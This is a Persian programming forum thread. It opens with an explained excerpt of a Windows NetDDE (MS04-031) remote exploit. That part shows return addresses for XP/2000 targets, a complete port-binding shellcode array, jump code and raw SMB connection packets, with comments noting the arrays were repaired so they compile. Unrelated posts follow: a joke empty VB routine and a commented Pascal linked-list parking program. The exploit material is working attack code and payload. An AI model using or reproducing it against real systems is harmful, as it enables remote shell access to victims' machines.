اين قسمت همانطور كه مي بينيد مربوط به شرط در C++ مي باشد اين برنامه جوري نوشته شده است ميشه هم در Windows و سيستم هاي لينوكسي Compile كرد به اين صورت كه ابتدا شرط بررسي مي كند اگر در ويندوز بود Header هاي مخصوص ويندوز را Call كند و اگر لينوكس بود به همين صورت ...
{ 0, "WinXP [universal] ", 0x00abfb1c - 0x20 },
{ 1, "Win2K [universal] ", 0x009efb60 - 0x20 }
};
اين قسمت مربوطه به Ret Address ها يا EIP هاي ويندوز هاي XP و 2000 است كه قابليت رو به ما مي ده كه همزمان دو نوع Windows را Exploit كنيم .. EIP يكي Register هاي اسمبلي است كه به دستور بعدي كه قرار اجرابشه اشاره مي كنه و با بازنويسي آن و point كرد به آدرس shellcode مي توان shellcode را روي stack اجرا نمود.
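/* portbind shellcode */
/*
 * Quoted copy of the portbindsc array from the listing above. The forum's
 * line wrapping had inserted a space after the backslash of the 13th
 * escape on every line ("\ x0c"), which is not a valid escape sequence and
 * does not compile; the bytes are restored to match the original listing.
 * Raw x86 payload, not disassembled here.
 */
unsigned char portbindsc[] =
"\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0c\x8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b"
"\x40\x3c\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78"
"\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b"
"\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03"
"\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b"
"\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c"
"\x61\xc3\xeb\x3d\xad\x50\x52\xe8\xa8\xff\xff\xff\x89\x07\x83\xc4"
"\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72\xfe\xb3"
"\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xa4\x1a\x70"
"\xc7\xa4\xad\x2e\xe9\xe5\x49\x86\x49\xcb\xed\xfc\x3b\xe7\x79\xc6"
"\x79\x83\xec\x60\x8b\xec\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5e"
"\xe8\x3d\xff\xff\xff\x8b\xd0\x83\xee\x36\x8d\x7d\x04\x8b\xce\x83"
"\xc1\x10\xe8\x9d\xff\xff\xff\x83\xc1\x18\x33\xc0\x66\xb8\x33\x32"
"\x50\x68\x77\x73\x32\x5f\x8b\xdc\x51\x52\x53\xff\x55\x04\x5a\x59"
"\x8b\xd0\xe8\x7d\xff\xff\xff\xb8\x01\x63\x6d\x64\xc1\xf8\x08\x50"
"\x89\x65\x34\x33\xc0\x66\xb8\x90\x01\x2b\xe0\x54\x83\xc0\x72\x50"
"\xff\x55\x24\x33\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x14"
"\x8b\xf0\x33\xc0\x33\xdb\x50\x50\x50\xb8\x02\x01\x11\x5c\xfe\xcc"
"\x50\x8b\xc4\xb3\x10\x53\x50\x56\xff\x55\x18\x53\x56\xff\x55\x1c"
"\x53\x8b\xd4\x2b\xe3\x8b\xcc\x52\x51\x56\xff\x55\x20\x8b\xf0\x33"
"\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa\x5f\xc6\x07\x44"
"\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab\x5f\x33\xc0\x8d"
"\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\xff\x75\x34\x50"
"\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff\x77\x38\xff\x55"
"\x28\xff\x55\x0c";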
شل كدي است كه با هدف Port Binding نوشته شده است يعني يك پورت را باز مي كند و listen مي كنه روي اون پورت بعد هم ميشه به اون پورت Telnet كرد...
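/*
 * Quoted copy of jmpcode from the listing above, with the forum's
 * wrapping artefact ("\ x90", an invalid escape) repaired so it compiles
 * again. Stub bytes, an ASCII banner, the 4-byte slot at offset 80 that
 * main() overwrites with target[ntarget].jmpaddr, and padding.
 */
char jmpcode[] =
"\x90\x90\x90\x90\x66\x81\xC7\x20\x03\xFF\xE7\x90\x90\x90\x90\x90"
"\x50\x6f\x43\x20\x66\x6f\x72\x20\x4e\x65\x74\x44\x44\x45\x20\x28"
"\x4d\x53\x30\x34\x2d\x30\x33\x31\x29\x2e\x20\x43\x6f\x70\x79\x72"
"\x69\x67\x68\x74\x20\x28\x63\x29\x20\x32\x30\x30\x34\x2d\x32\x30"
"\x30\x35\x20\x68\x6f\x75\x73\x65\x6f\x66\x64\x61\x62\x75\x73\x2e"
"\xBB\xBB\xBB\xBB" /* => eax */
"PADPAD";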
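/*
 * Quoted copy of smb_sesreq from the listing above, with the forum's
 * wrapping artefact ("\ x43", an invalid escape) repaired. NetBIOS session
 * request (type byte 0x81) with a fixed encoded name pair.
 */
char smb_sesreq[] =
"\x81\x00\x00\x44\x20\x43\x4b\x46\x44\x45\x4e\x45\x43\x46\x44\x45"
"\x46\x46\x43\x46\x47\x45\x46\x46\x43\x43\x41\x43\x41\x43\x41\x43"
"\x41\x43\x41\x43\x41\x00\x20\x45\x4b\x45\x44\x46\x45\x45\x49\x45"
"\x44\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43"
"\x41\x43\x41\x43\x41\x41\x41\x00";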
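/*
 * Quoted copy of smb_negotiate from the listing above, with the forum's
 * wrapping artefact ("\ x00", an invalid escape) repaired. SMB negotiate
 * request ("\xffSMB", command 0x72) offering the "NT LM 0.12" dialect.
 */
char smb_negotiate[] =
"\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x5c\x02"
"\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54\x20\x4c\x4d\x20\x30\x2e"
"\x31\x32\x00";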
مربوط به مرحله Connect كردن به سيستم قرباني از طريق پروتكل هاي به اشتراك گذاري ميباشد...
قسمت هاي مهم توضيح دادم در پست هاي بعد بيشتر روي اين موضوع كار مي كنم ..
موفق باشيد.
با سلام
اینم یه شاهکار تو برنامه نویسی روز دنیا:
Private Sub Form_Load
End Sub
با تشکر
:10:
این آخرین برنامه ام بوده ولی بهترین برنامه ام اولین برنامه ام بود. تاریخ تولد میگرفت سن رو نشون میداد خیلی حال کردم وقتی جواب داد
این برنامه یه پارکینگه یک طرفه است با یک ورودی و دو قسمت پارکینگ به شکل صلیب. با استفاده از لیست پیوندی و به زبان پاسکالکد:program test;
uses
crt;   { clrscr }
type
{ singly linked node for parking list 1 }
p_node = ^node;
node=record
name:string[20];
link:p_node;
end;
{ node1/pnode are an identical copy of node/p_node used for list 2;
  one type would serve both lists }
pnode = ^node1;
node1=record
name:string[20];
link:pnode;
end;
var
bln : boolean;            { set by del when a matching name was found; cleared again at its end }
k:string[10];             { name typed by the user for the queue (add) and for deletion (del);
                            string[10] versus name:string[20], so longer names are truncated here }
x,y,temp1,temp : p_node;  { list 1: x = head, y = most recently created node, temp = tail in add / cursor in show and del, temp1 = node to delete }
i,j,n,p,m,num,rear: integer;   { i, j = next slot of list 1 / list 2 (start at 1, lists hold 5);
                                 rear = number of queued names; num = menu choice; n, p, m = scratch }
a,b,t,te : pnode;         { list 2: a = head, b = most recently created node, t = tail/cursor, te = node to delete }
q:array[1..20] of string[10];  { waiting queue; add only fills it while rear < 5 }
{ add: read one name and store it in the first free place.
  Slots are tried in order: list 1 while i <= 5 (i starts at 1), then
  list 2 while j <= 5, then the queue q while rear < 5. When everything
  is full nothing is read and nothing is reported.
  temp and t serve here as the tails of list 1 and list 2; show and del
  reassign them while walking the lists (show resets them to y and b at
  its end), so an add after a deletion may not append at the real tail. }
procedure add;
begin
if i=1 then
begin
new(x);
write('enter a name:');
readln(x^.name);
x^.link:=nil;
temp:=x;
i:=i+1;
writeln(' ',x^.name,' saved in list1');
end
else
{ (i<>1) is always true inside this else branch }
if (i<=5) and (i<>1) then
begin
new(y);
write('enetr a name:');   { prompt typo: "enter" }
readln(y^.name); y^.link:=nil;
temp^.link:= y;
temp:=temp^.link;
i:=i+1;
writeln(' ',y^.name,' saved in list 1');
end
else
if j=1 then
begin
new(a);
write('enter a name:');
readln(a^.name);
a^.link:=nil;
t:=a;
j:=j+1;
writeln(' ',a^.name,' saved in list2');
end
else
{ (j<>1) is always true inside this else branch }
if (j<=5) and (j<>1) then
begin
new(b);
write('enetr a name:');   { prompt typo: "enter" }
readln(b^.name);
b^.link:=nil;
t^.link:= b;
t:=t^.link;
j:=j+1;
writeln(' ',b^.name,' saved in list2');
end
else
{ both lists full: queue the name (k is string[10], so it may be truncated) }
if rear<5 then
begin
rear:= rear+1;
write(' enter a name:');
readln(k);
q[rear]:=k;
writeln(' the lists is full. ',k,' saved in queu');
end;
end;
procedure show;
{ Print list 1, list 2 and the waiting queue, then leave temp and t
  pointing at y and b (the nodes add treats as the list tails). }
begin
  writeln('showing...');
  writeln(' list1:');
  temp := x;
  if temp <> nil then
    repeat
      writeln(' ', temp^.name);
      temp := temp^.link
    until temp = nil;
  writeln(' list2:');
  t := a;
  if t <> nil then
    repeat
      writeln(' ', t^.name);
      t := t^.link
    until t = nil;
  writeln(' queu:');
  for m := 1 to rear do
    writeln(' ', q[m]);
  temp := y;
  t := b;
end;
{ del: remove a car by name from list 1 (n = 1) or list 2 (n = 2) and,
  when the queue is not empty, move q[1] to the end of that list.
  Reads the name into k (string[10], so a name longer than 10 characters
  never equals the stored string[20]) and the list number into n.
  The search remembers the LAST matching node, then walks from the head
  to its predecessor; if the match is the head itself that walk runs off
  the end and dereferences nil. bln is the found flag and is cleared at
  the end. }
procedure del;
begin
write(' enter a car for delete:');
readln(k);
write(' enter a queu:');
readln(n);
if n = 1 then
begin
{ pass 1: find the (last) node named k }
temp:=x;
while (temp <>nil ) do
begin
if temp^.name = k then
begin
temp1:=temp;
bln:=true;
end;
temp:=temp^.link;
end;
if bln = true then
begin
{ pass 2: find the predecessor of temp1 and unlink it; fails for the head node }
temp:=x;
while (temp^.link <> temp1) do
temp:= temp^.link;
temp^.link := temp1^.link;
dispose(temp1);
i:=i-1;
if rear<>0 then
begin
{ move the first queued name to the tail of list 1 }
new(y);
y^.name := q[1];
y^.link:=nil;
temp:=x;
while (temp^.link <> nil) do
temp:=temp^.link;
temp^.link :=y;
i:=i+1;
{ shift the queue down; q[rear+1] is inside the array because rear <= 5 }
for p:=1 to rear do
q[p]:=q[p+1];
rear:=rear-1;
end;
end;
end
else
if n = 2 then
begin
{ same procedure for list 2 }
t:=a;
while (t <>nil ) do
begin
if t^.name = k then
begin
te:=t;
bln:=true;
end;
t:=t^.link;
end;
if bln= true then
begin
t:=a;
while (t^.link <> te) do
t:= t^.link;
t^.link := te^.link;
dispose(te);
j:=j-1;
if rear<>0 then
begin
new(b);
b^.name := q[1];
b^.link:=nil;
t:=a;
while (t^.link <> nil) do
t:=t^.link;
t^.link :=b;
j:=j+1;
for p:=1 to rear do
q[p]:=q[p+1];
rear:=rear-1;
end;
end;
end
else
write(' enter a queu true');
{ an invalid n also ends up here with bln still false }
if bln= false then
write(' no match found!!')
else
bln:=false;
end;
{ main program: menu loop. Initialises the list counters (i, j = 1 means
  empty), the queue (rear = 0) and the found flag, prints the menu once,
  then dispatches on num until 4 is entered. Numbers other than 1..3 fall
  through the case (no else branch) and simply re-prompt. }
begin
clrscr;
i:=1;
j:=1;
rear:=0;
bln:=false;
writeln(' 1:add to parking:');
writeln(' 2:show the car:');
writeln(' 3:delete the car:');
writeln(' 4:exit');
readln(num);
while num<>4 do
begin
case num of
1:add;
2:show;
3:del;
end;
write('enter a number:');
readln(num);
end;
write(' thanck you for use program');   { message typo: "thank you for using" }
readln;
end.